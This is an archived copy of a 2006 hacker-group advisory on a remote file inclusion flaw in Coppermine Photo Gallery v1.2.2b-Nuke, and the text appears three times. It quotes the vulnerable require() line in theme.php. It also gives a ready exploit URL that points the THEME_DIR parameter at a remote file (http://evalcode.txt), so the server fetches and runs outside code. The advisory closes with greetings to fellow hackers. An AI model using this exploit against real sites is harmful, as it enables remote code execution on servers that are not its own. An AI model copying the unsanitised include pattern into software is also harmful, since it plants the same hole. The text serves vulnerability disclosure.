Coppermine Photo Gallery v1.2.2b-Nuke Remote File Inclusion Vulnerabilities

2006-08-0200:00:00

vulners.com

JSON

Coppermine Photo Gallery v1.2.2b-Nuke Remote File Inclusion Vulnerabilities

Discovered By A-S-T TEAM
WE ARE CrAsH_oVeR_rIdE & BLACK-CODE & MR-HCR

site of script:http://phpnuke.org

Vulnerable: Coppermine Photo Gallery v1.2.2b-Nuke

vulnerable file :

theme.php

vulnerable code:

require($THEME_DIR."/user_list_info_box.inc");
$THEME_DIR parameter File inclusion

Exploit:
www.example.com/modules/coppermine/themes/default/theme.php?THEME_DIR=http://evalcode.txt

Discovered By A-S-T TEAM
Site:www.lezr.com
Greetz:KING-HACKER,YOUNG_HACKER,SIMO64,ROOT-HACKED,SAUDI,QPTAN,POWERWALL,SNIPER_SA,ALMOKAN3,Broken-proxy AND ALL LEZR.COM Member

JSON

Coppermine Photo Gallery v1.2.2b-Nuke Remote File Inclusion Vulnerabilities

Coppermine Photo Gallery v1.2.2b-Nuke Remote File Inclusion Vulnerabilities

Discovered By A-S-T TEAM WE ARE CrAsH_oVeR_rIdE & BLACK-CODE & MR-HCR

site of script:http://phpnuke.org

Vulnerable: Coppermine Photo Gallery v1.2.2b-Nuke

vulnerable file :

theme.php

vulnerable code:

require($THEME_DIR."/user_list_info_box.inc"); $THEME_DIR parameter File inclusion

Exploit: www.example.com/modules/coppermine/themes/default/theme.php?THEME_DIR=http://evalcode.txt

Discovered By A-S-T TEAM
WE ARE CrAsH_oVeR_rIdE & BLACK-CODE & MR-HCR

require($THEME_DIR."/user_list_info_box.inc");
$THEME_DIR parameter File inclusion

Exploit:
www.example.com/modules/coppermine/themes/default/theme.php?THEME_DIR=http://evalcode.txt